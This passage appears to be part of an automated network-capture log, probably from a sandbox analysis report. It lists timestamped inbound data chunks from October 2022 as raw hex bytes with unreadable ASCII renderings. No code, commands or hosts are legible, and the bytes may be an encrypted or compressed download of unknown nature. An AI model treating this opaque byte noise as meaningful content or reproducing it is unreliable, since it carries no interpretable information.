                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3943INData Raw: a3 c1 fa 5f 27 86 e1 8d d4 a2 10 05 53 92 b9 f8 da 2c 8a 60 6c 54 b8 fa 81 fc cb b4 79 6c 4c b8 ab be e2 42 3a d0 30 0e 04 b0 97 30 17 a1 5d 24 a0 61 bd f6 e1 24 5d 9f 9d da 32 e5 7d 5d 35 6b fb 2d 9b 94 9d 57 ad 22 d8 c1 9a e2 56 35 49 9c 35 88 9f 00 78 67 6d e8 e2 86 68 83 89 25 dc bd b5 82 43 98 20 d8 3c a8 5d 37 22 38 6d 82 6e cc cd 93 9b 28 1f 55 bb 76 22 76 2a 98 e3 af c3 b3 ca 86 18 e2 ea 94 30 9d 72 fd 91 bf 35 ff 88 6d ac a5 02 b1 c5 13 cc c2 d2 d2 9e 42 b9 54 aa 3d d6 f7 0d 20 33 b4 8b 06 fe 98 c1 eb 06 f0 b0 15 dd bc 3d 08 56 cf 01 cf 80 db 3f 14 fd d2 9a a2 34 b8 8d 4f bf 91 9f 27 c7 d7 b2 04 78 38 df f6 ad d8 31 b6 9c da 14 5b 2e a2 6f 7c 9e 16 22 11 9e 9e b8 3e da c0 57 8d f1 bd dc 60 f0 e4 e6 84 9c d9 e1 a2 17 2d 3c 1d 92 46 86 10 a3 fa 61
                                                                                                                                                                                                                                    Data Ascii: _'S,`lTylLB:00]$a$]2}]5k-W"V5I5xgmh%C <]7"8mn(Uv"v*0r5mBT= 3=V?4O'x81[.o|">W`-<Fa
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3959INData Raw: a8 2f eb ea 00 38 2b e6 e2 21 83 7a ab 1b d6 f6 4c 9f 1f d5 e3 e8 44 ab 75 45 ba 61 71 e3 a6 d4 a8 79 fc 47 86 9b 5d fb 28 d7 e7 46 87 ac 31 8f c1 49 f9 9d d5 57 0d 07 64 ff 59 3f 8c 35 f6 f7 18 5c f1 5b e2 b6 a3 03 8e 44 0c 05 00 49 04 dd d4 1e 97 d9 0f d3 92 ba 5f cf a6 e5 f7 fb a7 ec c2 31 5e f6 83 60 a5 e1 e9 78 cc cb 11 ce 28 a7 34 b0 f7 f0 0c d4 52 d0 6b 2b b6 6e 01 d2 cb 7d d3 8e 27 43 7f a8 1c e5 e8 ef bf 22 7a dd f2 45 86 37 f3 63 1c 98 b1 59 28 58 c5 ed 87 80 ed 62 f9 05 09 74 bf e0 de 20 9b 8e a8 2b 60 3f ff 1f 92 b6 cb d1 ef 18 15 a9 2d b4 77 d2 ec 61 61 9e 74 17 b1 b6 1e d1 a4 56 30 34 6d 1a a8 b7 cb 3b c8 5b f7 79 c3 ca cb af a5 35 de b2 21 60 85 57 1a 88 97 0b 9b 59 4a e3 cc 4b fc 79 a3 e7 a8 cb e2 82 fd 89 91 59 16 25 1b 44 23 0a 48 d5 b2
                                                                                                                                                                                                                                    Data Ascii: /8+!zLDuEaqyG](F1IWdY?5\[DI_1^`x(4Rk+n}'C"zE7cY(Xbt +`?-waatV04m;[y5!`WYJKyY%D#H
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3975INData Raw: 8b d3 83 05 66 29 8e 53 5f 1e c9 99 37 0c 40 8a 65 94 2f 9c 7a 69 46 05 4d 26 56 da e2 c4 17 23 60 fc 6d 2a 0f 32 6f 34 c4 dd cc 5c cf c3 ae 32 07 f6 a1 b2 36 10 68 55 44 d0 60 88 74 88 48 da a8 2c b6 d8 0a b5 27 02 e0 03 9e c9 52 60 ef 53 03 2b 85 3b 5d 54 d2 f7 f2 e2 93 2f 35 54 7f 05 a2 a7 d4 2f 53 89 95 3c 01 12 d9 ba 1a c3 7b 02 51 d6 1e be c0 45 4c 0e 32 27 8d 45 2e 4a 6e f7 a0 d8 17 4f 00 c7 f3 74 04 9a ab 64 5d d0 ce ef 75 dd 44 c3 a3 cb cd 16 f0 6c 52 f4 9f f2 4f 2d af 43 3b 2b bc 97 0f a1 5b 5e 38 0d 9c 78 31 b7 68 a0 50 91 4e b7 66 b5 85 5d 9d 77 71 e1 1b 60 7c f2 74 22 e9 44 87 f5 d5 bf 36 3f b0 89 c4 ed c5 0a 4c c1 1e c9 98 6b af 4e 5a a1 d8 91 b0 61 2c 4b b9 56 97 e4 4e d5 2a b3 fd a1 d6 a3 4a 33 c3 c4 a1 d7 7f cf 74 4b 53 62 d8 0a 4a f6 a7
                                                                                                                                                                                                                                    Data Ascii: f)S_7@e/ziFM&V#`m*2o4\26hUD`tH,'R`S+;]T/5T/S<{QEL2'E.JnOtd]uDlRO-C;+[^8x1hPNf]wq`|t"D6?LkNZa,KVN*J3tKSbJ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3991INData Raw: d0 7e 70 71 0b 89 88 64 f4 a8 6d 49 15 71 97 29 0d cf e5 3f c5 6c e9 5c 0b 26 6d c7 c0 a1 6f 0d e4 23 3e 48 da a3 85 b3 2e d7 9b 25 f8 a4 d6 e7 b7 04 f3 fd b7 f0 3f aa ec 24 72 55 fd 55 2a 6d 85 df 90 74 47 8c 11 d1 46 c0 7b d0 66 5e 3e e2 7c db 69 13 c5 92 39 e0 85 db fa ed f1 dc 72 ee a0 cf e3 ca a2 89 ae 4d d9 dc aa 55 ec 5b fc d5 64 ed c8 fc 9e 01 fd 1f 54 d4 bb fe c6 a9 3a a8 d9 27 bb cc ef 8d f9 d1 c8 da 47 ab b3 28 a7 4c 03 90 c8 24 bc 18 cf 9b f7 59 96 25 21 f0 ed 80 0d eb 9c 47 11 16 d5 b2 f1 b7 42 9b c4 0e 43 ab d9 12 20 d2 c7 92 99 82 2c 33 63 0a 63 48 e6 b9 fe 32 62 60 33 6c a8 b8 bf b9 d2 ed c5 cb f6 aa 5a ed 01 83 6b 88 53 d0 b2 ba 67 75 7e d4 66 49 a7 75 75 c2 a9 ad 4f 94 56 4a 7c c3 97 23 d4 be 43 7d 4d e6 a6 a3 95 b2 c3 bf 50 e2 0f 1f a1
                                                                                                                                                                                                                                    Data Ascii: ~pqdmIq)?l\&mo#>H.%?$rUU*mtGF{f^>|i9rMU[dT:'G(L$Y%!GBC ,3ccH2b`3lZkSgu~fIuuOVJ|#C}MP
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4007INData Raw: be 30 a9 18 28 34 f8 1b 58 62 38 bf 3e aa 15 80 93 79 bb 7e cb 64 1f 82 c7 96 cb 8a 03 54 26 f4 c9 db 86 e3 38 30 bb 74 ac 89 9b a2 d9 d5 24 80 70 94 ee fe 6f b1 68 63 0c 7d 86 88 fc ee 4b 17 a6 aa 5a 7f 79 a9 a1 91 83 6d 28 92 3a 44 44 2f f9 d1 76 74 ee 63 67 c0 00 ff 50 9c 19 ab a5 85 e3 76 a0 61 76 2a a1 09 7b a7 4b 1a b3 d9 09 32 0f 5b 2d c7 a6 34 61 6f 7c 6e b5 c9 a3 6c 07 79 83 f0 e5 c0 e9 0c 5a b1 f2 16 7c e6 9e c6 e8 41 01 13 c6 4f 32 70 2e 02 c4 ab 63 0e a6 cc e9 39 84 43 23 f3 25 d2 0d b1 06 6a 25 55 8b f7 83 e5 c9 e1 35 96 15 62 33 f0 ae 4f f6 d5 c7 12 7d f5 90 51 46 41 93 55 c0 d3 cd 0d f8 90 12 e5 f6 79 05 8b 3a 7d 45 95 57 6b 4b 13 ac 9c 7e 9c d0 54 c5 6f b7 16 1f 9d af 99 09 68 e7 6e 23 7c 6d 77 85 5f 58 50 8a c0 2f 30 c4 ea 1c db 83 fe f5
                                                                                                                                                                                                                                    Data Ascii: 0(4Xb8>y~dT&80t$pohc}KZym(:DD/vtcgPvav*{K2[-4ao|nlyZ|AO2p.c9C#%j%U5b3O}QFAUy:}EWkK~Tohn#|mw_XP/0
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4023INData Raw: 77 b0 d5 09 6b bd 63 4b 1f 70 9a 88 4b e6 f1 9e f3 3a 03 b1 67 40 28 12 70 db a7 3f 88 56 8a 31 8b 4f 1d 57 9e 08 89 9e 89 9b 7a 0f ee be d5 19 93 f9 62 c6 80 0c 5e 1b 67 be f9 de 0b f8 d6 cb 46 06 85 b7 a5 08 44 8b 9c 44 7b 5c cc 57 1b c5 61 7f cd 29 5b a3 0b 2d 5f 03 f1 66 16 b5 2a 49 8d 24 94 61 7b dc e4 43 5e d8 80 53 f8 99 f0 49 23 29 d4 db 1f 0b 1d 26 0c 1e 4e a6 97 25 10 10 cc 38 6d 32 f7 17 92 22 41 35 0a b3 70 df b4 5a d7 42 ad 81 69 d2 aa 5e 16 a7 e4 b3 dd 5a 43 13 9c 73 ac a9 ec c7 68 52 ee a9 72 02 99 ab f7 18 68 46 48 31 0c f1 84 a9 52 06 fa 88 43 4e 9f ff 76 9a 75 a7 93 b2 11 d9 4f 85 6a 74 9f 4d 6b 9e bd ef 4e 1f 67 9f d0 ae cf 01 39 f3 e3 f1 a5 c4 4e 28 46 c3 89 82 56 6a af ff 61 a5 5c 91 e4 d5 70 61 17 76 6f 9c c6 83 62 3d f9 3d 4d 46 2c
                                                                                                                                                                                                                                    Data Ascii: wkcKpK:g@(p?V1OWzb^gFDD{\Wa)[-_f*I$a{C^SI#)&N%8m2"A5pZBi^ZCshRrhFH1RCNvuOjtMkNg9N(FVja\pavob==MF,
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4039INData Raw: c1 63 cb e3 e1 9a df 09 71 a8 ea 93 64 3d 74 4b ad fc 92 c5 eb 40 73 40 02 f3 5c f8 03 05 a9 fa 34 18 1d 49 fe 91 25 82 fc 2a d6 31 d8 6e 02 04 65 3e 50 9e f0 0e 28 2c 6e ef aa 33 dd b2 cc c7 99 82 d1 1d c8 60 aa 6c 6b 4d 8a 40 0a 6b 20 61 c9 c2 b5 72 e0 09 b2 f4 96 3d fa 82 2e 41 22 e4 34 4c ea 68 76 95 4f 70 0f 2c af 1c b8 8f 41 3f 30 9d 5c e0 1e 59 4c 09 3d e5 f8 50 ba 21 0a 54 62 ee e9 7f be 28 03 65 3e 4a 2c fc 28 49 98 f0 ea e1 d6 b0 51 0b b1 90 3b 42 08 6a 19 45 56 96 da b9 d0 80 1f 30 ab d2 19 c4 78 d6 69 4c 75 2a d0 1b d6 61 5f c7 e4 a1 da d9 37 bd 2c a8 ba e6 77 37 cf ec 92 6a 8f 70 0d 94 b2 bc 77 5c b4 cd 39 ff 41 fa 0d 31 4b 72 0a ac e7 39 e4 ca 7c 61 e0 5b 3e 5e 9f 4e c5 10 d4 6b af 4b 6c 36 49 04 06 b3 88 81 9b 9d 78 68 aa e5 10 c4 af e5 b3
                                                                                                                                                                                                                                    Data Ascii: cqd=tK@s@\4I%*1ne>P(,n3`lkM@k ar=.A"4LhvOp,A?0\YL=P!Tb(e>J,(IQ;BjEV0xiLu*a_7,w7jpw\9A1Kr9|a[>^NkKl6Ixh
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4055INData Raw: fa a4 42 c8 a4 03 56 6f 27 49 eb 70 e6 e3 7c 5d 18 c2 3f 20 12 d6 02 0b 88 30 25 6e 8b f8 eb 59 7b a2 42 e7 e3 6e 13 c7 0f 62 fd 29 a9 47 cd 49 bc 05 b9 e9 95 b5 91 e4 6d aa ea 35 c6 5b cb a2 4a d2 93 00 4d 81 f2 45 af 68 57 db 78 c1 84 74 cf b8 d2 7e ae c6 7b 04 fa 66 d3 c8 a0 6f 81 e2 a1 39 49 50 37 05 65 cc 93 3f e8 bb f2 4a 70 7e e7 ab c3 e9 4d 08 e0 7f 5d f5 ac 83 05 d0 a0 47 5b 2b 3d ff f3 31 11 10 d7 49 81 ea 4a a2 8a ff 76 15 3c 8d 16 1b 53 ad 4a 95 4c cc 20 0b 32 c5 02 f0 13 69 97 fe 2b d8 4b 70 c7 90 4c 9c 94 54 95 24 4a 08 f1 1e c8 5e c0 a0 0b aa 6b 95 cf 2f a8 5a ea 39 17 30 69 3e ab 08 f6 c0 3b 65 52 80 e2 83 94 58 61 b0 a9 28 f5 5d 5b ff 63 5e 65 45 f9 f2 52 18 61 b5 90 5a 0e f4 b8 5f fd 36 99 c5 ee a8 01 86 a3 07 fc e6 c8 c1 b1 02 db ef f0
                                                                                                                                                                                                                                    Data Ascii: BVo'Ip|]? 0%nY{Bnb)GIm5[JMEhWxt~{fo9IP7e?Jp~M]G[+=1IJv<SJL 2i+KpLT$J^k/Z90i>;eRXa(][c^eERaZ_6
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4071INData Raw: f0 18 4f f1 a2 29 0d 73 10 67 7d e1 3f a8 e0 7b d6 f1 52 aa b5 e4 b8 6b d0 73 43 01 13 0d 5a 8e 33 01 d8 a7 80 ee 46 95 d2 ce 42 dc 72 e5 54 d3 0c 92 8b c4 39 33 f7 ac 9a 5a f4 65 a9 cd 5d ee dd f2 d6 3b dd cb c9 2f 4e e3 e6 df fd fe dc 6a 60 f4 59 d3 46 1e d7 0b 1f d4 58 ba 5b b6 29 3f f2 0b 93 e9 46 5a d6 fb 44 69 3c 3b b9 2e 5d 78 82 c9 f1 2b b8 98 b3 ae 4a ce ef 3a eb 24 d6 bd a1 8f 76 6f 4b 1f 16 87 15 65 39 e7 bf ff e1 b9 9a f2 64 3b 87 e4 ca 96 57 d6 14 76 b9 7a 61 e4 67 96 4c aa b4 84 05 a0 48 85 84 91 5d 49 7f cc f7 73 f1 49 e0 64 26 e0 80 12 7b 8e b0 38 ab 05 f9 df a1 f3 c8 7f 1e 5e 95 e3 e2 de 0a 8c 9b 79 5a 95 fe a7 dc 44 23 d4 14 93 1a df 1b 0d a6 a1 6c 8e ac 15 3b 9e 8d ad 3a 75 74 aa 4a 45 59 ab cb ea ff a4 b7 f3 36 c6 31 0b e5 44 bc 05 a5
                                                                                                                                                                                                                                    Data Ascii: O)sg}?{RksCZ3FBrT93Ze];/Nj`YFX[)?FZDi<;.]x+J:$voKe9d;WvzagLH]IsId&{8^yZD#l;:utJEY61D
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4087INData Raw: 7a 95 ea 93 8a 0b 2e bd 22 f7 cb 18 ae e2 33 28 65 6c 96 d0 e8 0c 15 26 90 37 30 62 77 a3 3c af 5a 4e 91 0e f1 3f 90 0d d4 09 64 08 51 7c 89 c6 ee bc a0 80 31 07 4b 09 62 6d 6e 60 2d 02 8f d7 a4 6f 84 45 bd 9f 45 08 13 7b df 03 57 ae b9 9e e4 4c de d7 39 ff 64 62 28 e5 ce 84 d1 bf 51 06 f1 e5 69 ad a1 93 e8 f6 50 bc 58 76 1f b8 2b 35 9a 40 b0 35 e8 b3 0c 8d 74 b3 c0 eb c8 2f 4e a5 c6 d0 df 7b de f7 db cf d6 8e 36 aa a0 b0 ed 9b bf aa 32 e9 e0 06 ce 86 ea 68 0a dc 59 d1 23 9a c4 ab 03 4f f7 4a c6 7e ea 6e 8d 84 bf e8 50 98 49 a5 25 96 9c 85 a4 ed 14 f3 cc 5a 21 57 98 4e e6 d6 9e d7 33 3e e2 de 65 52 9b da 4c f2 3d 8b bf 28 a2 4c ea 8e 86 c0 1c e4 3c 0f 86 8b fc 62 53 82 25 94 d2 9a 5c f5 ee 6a 95 1b 75 20 f4 53 00 6f 73 e4 3c 81 36 2b 8c ae e5 3e fa 9f 47
                                                                                                                                                                                                                                    Data Ascii: z."3(el&70bw<ZN?dQ|1Kbmn`-oEE{WL9db(QiPXv+5@5t/N{62hY#OJ~nPI%Z!WN3>eRL=(L<bS%\ju Sos<6+>G
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4103INData Raw: 27 d8 ad 9b 9b 04 53 86 d4 85 3b 71 3d 32 2d 78 32 ba c1 26 d5 da ff 7b 2e dd ec 84 86 27 56 8e 07 f2 3f 4a 51 8f bf 27 ef d3 e5 b8 ef 22 73 f9 28 3c ed 44 83 3e 1e 0d e7 a7 b5 5d 58 20 5f 67 ac 33 65 ab 15 38 e6 1b 7c 04 13 04 fd 32 24 68 f0 4c 5d 77 cd 50 fd 17 8c cb 07 7d d3 92 39 59 04 0c 13 f0 d5 49 43 4d b1 02 e9 f3 98 e1 4e 62 85 d0 d5 de 7c 38 87 7d 6a 0a 21 c3 a2 55 b2 1a 10 87 b8 a4 2e 98 68 24 17 c1 22 41 35 b6 ea 5a af 88 07 55 4b f7 13 ce 68 5a 81 33 28 f2 0f c5 6a c0 bf 76 83 14 d9 6b 99 b9 69 e7 3e ba 99 7f 54 fd 2b 5b 79 6f b0 7c 1b 24 e0 a8 11 e7 b7 e0 95 71 98 18 11 44 8c 71 a1 64 4b 18 1d ba d7 57 a6 93 19 3e 17 c4 52 7b bc 8c e5 f0 e4 10 ad 15 40 15 41 d7 a2 1d 80 90 62 2d 74 c7 4a fa 5a 85 a9 00 4a 89 e3 9f e1 47 3a 8d ae 7b 38 c7 91
                                                                                                                                                                                                                                    Data Ascii: 'S;q=2-x2&{.'V?JQ'"s(<D>]X _g3e8|2$hL]wP}9YICMNb|8}j!U.h$"A5ZUKhZ3(jvki>T+[yo|$qDqdKW>R{@Ab-tJZJG:{8
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4119INData Raw: a5 ed b2 ef 6c d1 7f bd ca 5b 64 81 44 13 80 f7 8d ed d0 b7 8d 06 73 8b 59 24 7d 5f 64 d0 d5 10 0e d6 95 ef 2b a0 91 13 ee c3 a4 59 d9 82 b3 b3 21 86 72 5f 19 0b b5 05 0a ee ae 8a fe 11 41 6d f3 95 db ab a1 2c cc d9 82 5c 84 82 73 33 ac 6c f6 8b c2 f4 ec 00 05 3c 3e 22 bc 04 67 c1 c1 e8 ce 3e 6a 6c d0 dc e1 d5 16 3d ed ce 8a 51 3f e4 8d e9 20 45 99 7f 7d 2a e4 b2 27 12 ed e2 05 93 d1 66 a9 dd 43 94 cc ab 26 89 4f 50 18 1c dd 56 11 c3 6e 9b b9 f3 f2 91 e2 d4 72 a1 f6 ac 54 31 e8 d6 da 31 61 0d be ce a0 23 dd 8b 7a 8c f3 22 01 93 32 34 21 ff 42 2a 83 9f 6f 29 e6 e3 fc 5f 96 d5 ba a7 24 fa ae e7 cf 15 e5 7b 46 62 3f ae 19 db 65 a4 d7 c0 8d 34 b2 46 29 aa bd 52 60 d7 ac 30 5f a0 35 4d c5 03 4e 22 95 a2 51 8b 4d f0 db 70 be a6 51 19 91 4e 5f b6 d8 e6 06 3e cf
                                                                                                                                                                                                                                    Data Ascii: l[dDsY$}_d+Y!r_Am,\s3l<>"g>jl=Q? E}*'fC&OPVnrT11a#z"24!B*o)_${Fb?e4F)R`0_5MN"QMpQN_>
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4135INData Raw: 66 51 81 85 66 30 2d b1 f6 58 74 e0 98 6d f6 7e ec 54 4e e9 af 80 63 2f 1a 34 49 e3 02 d6 7a 8c 3c 29 3a 45 f5 24 11 c4 b6 4c 28 32 86 c0 5a 2e f1 cf 39 ea 01 fd cd 4b 1d fe b7 9e 9c af 05 59 6b 50 3e 36 f4 b4 c1 49 bd 8e 4b 8d f6 cc 0d 6d f0 2f 33 38 6c 43 dd 14 a6 64 ad 74 ee 2e 40 a4 d1 4f f7 a5 bb ff a1 4f 3f da bb f0 ff 4b ce 3f 57 17 a9 d9 32 47 1a f4 ec 33 9b 3c 66 90 27 90 ea 82 80 32 da 30 bd 99 4b a5 44 dc 93 90 5d 6c 5d 32 7b 1b 3a cf 94 50 52 be 7b 16 45 01 90 5f ed 67 b9 a8 24 1e 22 f7 19 70 51 4f 06 c0 75 b8 57 52 dd 8e 09 e6 d3 92 f1 cd 6d 30 c7 32 72 81 ba b7 b2 b5 86 5c 10 a2 4b 75 3a 6a 16 0c 5c a2 72 07 20 90 d1 05 03 89 38 a7 e6 6d 3a 92 b6 28 bf 07 99 27 b6 3b f4 07 ca 8b 20 b4 54 3b 6f 42 fa 56 63 09 95 d9 38 37 62 25 86 f4 83 4c 86
                                                                                                                                                                                                                                    Data Ascii: fQf0-Xtm~TNc/4Iz<):E$L(2Z.9KYkP>6IKm/38lCdt.@OO?K?W2G3<f'20KD]l]2{:PR{E_g$"pQOuWRm02r\Ku:j\r 8m:('; T;oBVc87b%L
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4151INData Raw: 45 0e 9c 83 0f 09 ca a1 c8 12 a4 52 03 31 60 1a 40 fc 90 71 af b9 0b ed 45 c5 a0 d0 48 5d ed 20 18 f1 c3 f6 6c d5 17 24 3b 78 82 92 0d d0 a6 d6 95 90 8a 0b d0 8d 7b 63 ed b0 62 07 a4 7b 1f e4 72 2e 6e de 01 ff 01 1a ad d9 fa 76 5f 12 37 cc ce 91 ad aa 1c 6d 91 62 f6 a1 14 36 35 9b b6 39 b0 82 1c 29 a8 ad a3 a5 4c ff 35 07 85 82 5d 91 e2 83 01 65 48 b1 1f 87 38 da fc 47 e5 eb 6d 8a 2c 2a 2a 59 2a dc b2 4b ae 1c dc b2 83 f0 57 d7 be 57 d0 73 8b 01 74 62 1d b6 3d 50 85 b2 bc d8 eb 40 2f 71 04 d7 31 fd 5e 14 6f 59 7b 06 13 68 96 c1 ea c2 fe 34 99 1c 4a b3 11 e7 26 a0 99 f6 3f 0d 1f d6 13 c6 60 d4 d9 ac 2f c2 44 de f8 f0 90 c1 85 b0 5e 16 e7 1d 21 00 be 64 e5 6d e1 72 f1 b2 32 19 34 cb f3 d2 72 d8 8b b0 86 4d 68 62 70 da f3 d3 49 74 85 7b b1 e4 6b f1 55 bb 40
                                                                                                                                                                                                                                    Data Ascii: ER1`@qEH] l$;x{cb{r.nv_7mb659)L5]eH8Gm,**Y*KWWstb=P@/q1^oY{h4J&?`/D^!dmr24rMhbpIt{kU@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4167INData Raw: 35 2f 79 be 7d 31 51 bd 1c 2e 27 85 de 8a 7d 9a e7 c4 27 49 d9 d2 48 59 43 00 bb 0f b3 bf c3 38 3e 4a f7 70 57 76 b8 af 0e fe 89 cd 1b f1 63 01 ac dd a4 2f 84 4d 8b 51 37 40 26 96 bb 6a b4 67 44 a6 63 98 90 2b 12 07 e4 3e 97 3a 64 f4 b9 34 44 8b b2 0f 8e c1 61 d8 40 bf 45 ca 74 0c c2 0c 10 7c 0f 80 33 14 67 4e 6c c6 28 6f 82 ab 34 35 47 09 5b d0 14 df 3d 8e 64 59 82 db 0c 7d 20 11 c8 98 f1 d7 48 15 91 da b0 c5 c6 ab 59 91 05 5f a4 dd 81 f9 b2 06 cb 8a cc b3 a8 13 c4 d9 35 6e c0 c0 50 30 18 75 70 da f5 74 70 ec a7 2f 45 14 50 49 89 b9 bd 0d e2 83 5a 24 01 41 f7 e4 b0 2b 41 5b cd f8 2a f7 01 fb 44 15 b4 1b 93 10 76 58 88 ae fc a0 3a b6 48 f4 fb 29 be 59 28 16 1a a4 61 42 ec dd 2a 9f ee e2 9a e7 fe bb a8 2c ec e8 69 58 ea 84 af df ef d5 53 fb 8b 20 6a 66 5b
                                                                                                                                                                                                                                    Data Ascii: 5/y}1Q.'}'IHYC8>JpWvc/MQ7@&jgDc+>:d4Da@Et|3gNl(o45G[=dY} HY_5nP0uptp/EPIZ$A+A[*DvX:H)Y(aB*,iXS jf[
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4183INData Raw: fe 09 3f 34 cc 1d fb 57 35 c7 3e c9 57 b8 8d ff 78 4b 7d 13 02 5f ba 7a 36 49 fc 8e 9e 53 b2 94 b8 e0 a9 3e 98 97 78 3b 2e 9e 78 23 e0 10 42 fd 83 83 df c6 8c d2 94 9b f8 9c e3 30 23 17 01 de fa b4 26 94 e1 b6 47 5e 73 1d bb 34 20 55 30 ee 87 c4 d4 f9 0a d7 17 24 42 1d 60 08 7f a9 ae 43 91 8c e4 95 4f 7e 84 0c f3 fc 08 05 28 a0 91 62 2a b5 bb 06 71 b3 fe af 18 27 ea a8 22 7d 22 45 f7 f7 25 04 fd 66 5d b0 45 45 d4 7d a3 44 19 5a 4a 34 b2 f1 be 85 a0 78 08 9c 1c 1d fe 0a 94 96 29 cd 44 35 8a 2f 13 c8 71 e3 eb db 96 1e b3 21 36 6c e8 0f 1a ac f0 ca 74 7c 94 6e 57 44 0c ba c9 45 ea f4 46 27 6a d2 39 68 b7 bb 24 59 20 af 5d 66 9c b8 17 eb b0 2b ef 8d 3e f1 69 5b 71 5b 7b f6 09 87 59 57 40 4a 82 12 fb 34 f5 12 89 d9 fe fb 2b bf f3 fc 63 4e 3f 6f 37 a8 9d 18 c0
                                                                                                                                                                                                                                    Data Ascii: ?4W5>WxK}_z6IS>x;.x#B0#&G^s4 U0$B`CO~(b*q'"}"E%f]EE}DZJ4x)D5/q!6lt|nWDEF'j9h$Y ]f+>i[q[{YW@J4+cN?o7
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4199INData Raw: fa fd ba b7 5c 48 6e 13 a7 af 40 7d 77 6e 8e 2d 11 b3 d5 3c 87 39 b7 3c dc c6 76 5a bc 32 54 7f 81 3f b8 42 c0 6d f1 f1 36 3e ba 5a 05 e9 df 4b 99 71 99 12 92 93 cb e3 0a 69 4d a3 7f b6 03 48 c8 c6 80 ae 72 96 ef 70 a1 be 08 7e 7d ef 09 9c 20 ca d8 40 bb 72 5c c7 cb ad 09 22 6c 9a 5b a7 6d c3 23 01 f6 78 f3 76 b9 44 a1 b7 ec 99 33 dd 6f 57 03 d0 d3 f0 74 8b d3 ea 66 67 4b 68 8e 3b 2d d5 ae 54 b3 c3 1c 8e ee c0 bd 3f 91 d5 f5 6a 7c 18 d3 52 0d 72 51 bd 30 45 7a bb 8a 90 ea e1 a5 07 d4 0c fc 9c f4 f0 25 cb 22 37 fc 4f 63 7f 02 e8 99 c2 ca c3 08 b1 47 ab 2d a9 02 f0 1f 9b 63 cb 89 19 39 61 00 6a 50 2a ac 21 1e d1 6b 37 e2 a3 5b 14 85 f6 36 a2 97 25 74 0c 65 f8 f3 58 cf 2e a5 91 0c 67 09 5f fc 15 11 e9 29 93 96 8d 9b fb 61 c5 bc 56 a1 1d de 28 03 9f 25 df f4
                                                                                                                                                                                                                                    Data Ascii: \Hn@}wn-<9<vZ2T?Bm6>ZKqiMHrp~} @r\"l[m#xvD3oWtfgKh;-T?j|RrQ0Ez%"7OcG-c9ajP*!k7[6%teX.g_)aV(%
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4215INData Raw: 67 b0 57 81 ef 35 6b 7d 1b 2a 8c 8d d0 7f df 2c 8d fe bb a2 f8 4e 8e 80 0b 26 05 76 6c 29 2f 75 26 e3 4f 71 4a ec 8f d8 3d 68 3f 16 20 a9 1c 15 e9 c9 76 f1 ec 95 99 f6 7c b9 c3 0a 27 f2 05 a0 99 7b 2d dc f5 7b 2e 7b 0d 14 7d ca 71 26 82 c5 39 68 dd 11 63 a2 ba 6f b1 17 27 24 29 4b 8b 7b a8 1b e1 49 f0 fe 20 57 02 93 76 91 b7 69 c5 75 67 e3 d9 54 0b 35 ba e2 32 f6 d4 3b 96 58 0c 2f b9 2a 1e 23 fe 50 a9 da d1 75 b5 86 d7 8f 9e 44 b7 6d 9d 29 54 56 77 2d a2 2f 57 73 f4 71 56 c0 46 b9 7b ee 7d e5 da 3e 41 7b 5e ca 18 0d c0 57 8a 18 c1 38 a2 f9 2b d9 68 24 dc 70 72 b2 86 c5 c0 89 f3 5b a1 33 24 0a 26 e4 e1 29 94 f2 f0 a5 49 29 86 37 60 ed be 87 0c 0a 12 c9 e9 ac c7 e4 c5 24 7e 3a 83 44 a8 1c ff a7 f5 3d 54 4a 3e 0a 12 74 af 1d c2 90 4f 03 de ea 9f 15 a2 27 a1
                                                                                                                                                                                                                                    Data Ascii: gW5k}*,N&vl)/u&OqJ=h? v|'{-{.{}q&9hco'$)K{I WviugT52;X/*#PuDm)TVw-/WsqVF{}>A{^W8+h$pr[3$&)I)7`$~:D=TJ>tO'
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4231INData Raw: 1e f1 ad b6 8e 26 bb 0d 3d 2f b7 66 4a b3 6b af 7b 7c 60 01 d9 a0 2c 74 6d 4f 81 b7 ae 89 36 fa 67 af 39 4a 6a 2d 4a f6 11 51 c9 11 df 76 64 2a 65 e1 01 84 4f 44 df d5 37 fd 10 2a c3 cd 7b 21 54 7f fb ce e9 57 a9 89 73 4a f3 5e b1 d1 06 4e ba 4b 47 54 59 22 de 63 8a cc cb ab 9d c1 cd 6e 90 25 75 03 a9 ee a2 12 9f df 02 d6 ec 72 88 50 bf e7 42 55 ad 04 dc 61 e7 55 d0 12 db 2e b0 e5 1b ba 66 38 95 ad 7b 29 20 7b 90 89 ac 9c 99 c0 05 b3 6d ec 0a cc a6 dd c8 b0 1c 7c d4 e8 48 30 73 ef 26 0d df 35 b5 86 c9 b4 93 79 08 b7 fb 7d 28 38 46 e1 08 4f df d7 0a d2 e1 a5 38 17 a0 ff 61 59 94 31 3b 13 a8 1e 98 70 82 f0 92 0a 84 b7 53 f5 58 62 b5 d5 58 44 6b 1e 77 5e 68 71 d8 47 99 4d e1 b7 6e 78 e5 fa 77 d0 16 99 e1 c1 c6 7d 5b ba 35 52 c0 33 87 c3 ab 77 46 10 a6 30 b0
                                                                                                                                                                                                                                    Data Ascii: &=/fJk{|`,tmO6g9Jj-JQvd*eOD7*{!TWsJ^NKGTY"cn%urPBUaU.f8{) {m|H0s&5y}(8FO8aY1;pSXbXDkw^hqGMnxw}[5R3wF0
